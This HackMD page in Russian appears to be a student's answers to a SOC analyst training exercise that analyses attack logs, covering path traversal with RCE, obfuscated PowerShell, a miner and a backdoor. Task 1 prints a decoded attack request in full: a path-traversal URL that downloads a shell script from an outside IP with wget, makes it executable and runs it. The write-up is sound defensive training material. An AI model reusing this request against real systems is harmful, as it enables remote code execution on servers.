HackMD - Collaborative Markdown Knowledge Base

Мониторинг ИБ. Работа специалиста SOC Task 1 ![](https://i.imgur.com/M3snZvd.png) Видим что часть url закодирована Раскодируем ![](https://i.imgur.com/9VRMVKs.png) ![](https://i.imgur.com/DPW51JI.png) Получается строка: /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=wget http://136.144.41.3+igipdmcdmsklcmk%2ohsitsvegawellrip.sh ; chmod 777 ohsitsvegawellrip.sh ; sh ohsitsvegawellrip.sh ; wget https://https:%2%2iplogger.org"FGVP5c Видим /login.jsp/..; Сервер проверяет авторизован пользователь или нет, но видимо человек смог обойти эту проверку Файл tmshCmd.jsp - баш оболочка выполняющая команду: wget http://136.144.41.3+igipdmcdmsklcmk%2ohsitsvegawellrip.sh wget - скачивает файл: http://136.144.41.3+igipdmcdmsklcmk%2ohsitsvegawellrip.sh После идет команда: chmod 777 ohsitsvegawellrip.sh Команда chmod выдает привелегии 777 Установка 777 разрешений для файла или каталога означает, что он будет доступен для чтения, записи и выполнения всеми пользователями и может представлять огромную угрозу безопасности Команда sh ohsitsvegawellrip.sh запускает файл Далее идет команда wget https://https:%2%2iplogger.org"FGVP5c Каким образом выяснено, что это атака? ![](https://i.imgur.com/9tfP3V1.png) Обход авторизации, повышение прав, запуск файла IoC Изменение прав доступа Повышение привелегий Не стандартное использование web Не стандартное поведение для человека Каким образом можно удостовериться в успешности атаки. Запуск файла Похоже что в приложении имеется уязвимость Broken Access Control с последующей RCE Task 2 Скриншот ![](https://i.imgur.com/0AzKXG7.png) Что подозрительного в событии? Оператор форматирования -f Команды Invoke-Expression загружают код и выполняют его С какой целью реализовано? Шантаж http://tinyurl.com/y7ukpduz ![](https://i.imgur.com/cTbdlNm.png) Task 3 Что в этих событиях является подозрительным? Подозрительный хэш ![](https://i.imgur.com/8HtgRpU.png) Вход пользователя ![](https://i.imgur.com/XxSqL4z.png) ![](https://i.imgur.com/jwtXKj4.png) Запуск скрипта ![](https://i.imgur.com/TGq1B65.png) ![](https://i.imgur.com/bBs7kWU.png) Чтение диска и создание файлов ![](https://i.imgur.com/7TVcbam.png) Подкачка ![](https://i.imgur.com/FdYLNfm.png) Какие признаки указаных событий на это указывают windows defender ![](https://i.imgur.com/PfyMuG5.png) Pipe ![](https://i.imgur.com/LRKMIn3.png) ![](https://i.imgur.com/x75J5Vj.png) Какие индикаторы можно выделить Pipe Windows defender Неавторизованый вход Запуск скрипта Опишите подробно суть подозрительных действий в системе, зафиксированных в журнале Идет создание офисных файлов, после чего подключение через pipe, создается файл, куда загружается скрипт Скрипт называется omni_consumer ![](https://i.imgur.com/TEkHxWP.png) Что произошло на узле? Был внесен вредоносный код в powershell Откроем event.json ![](https://i.imgur.com/KecqG0K.png) Раскодируем base64 ![](https://i.imgur.com/0NGpGji.png) ![](https://i.imgur.com/6FH9Sby.png) С помощью чего это удалось добиться? С помощью замены символов, архивирования, шифрования в base64 Если есть, то укажите адрес C&C и порт. Не обнаружен Task 5 ![](https://i.imgur.com/yPvjEWr.png) К какому семейству принадлежит данное ВПО? ![](https://i.imgur.com/Ax81TJW.png) ![](https://i.imgur.com/9IjqhKF.png) Evader, miner Имена файлов, которые могли быть загружены на компьютер. ![](https://i.imgur.com/ShnrfnV.png) Task 6 ![](https://i.imgur.com/1KjqFYH.png) Описание Пользователь vmpumpkin скачал архив с игрой ![](https://i.imgur.com/sZhjmJJ.png) Remote host ![](https://i.imgur.com/y7bEJvQ.png) Cmd ![](https://i.imgur.com/wGhOBjX.png) PowerShell ![](https://i.imgur.com/dHoMVn0.png) Бэкдор ![](https://i.imgur.com/uFmTncl.png) Атакующий ![](https://i.imgur.com/V0QvffG.png) Признаки, по которым можно выявлять подобную активность Вход пользователей настройка удаленного доступа Запуск cmd, powershell Данные для осуществления мер по реагированию Настройка удаленного подключения Изменение данных реестра на изначальные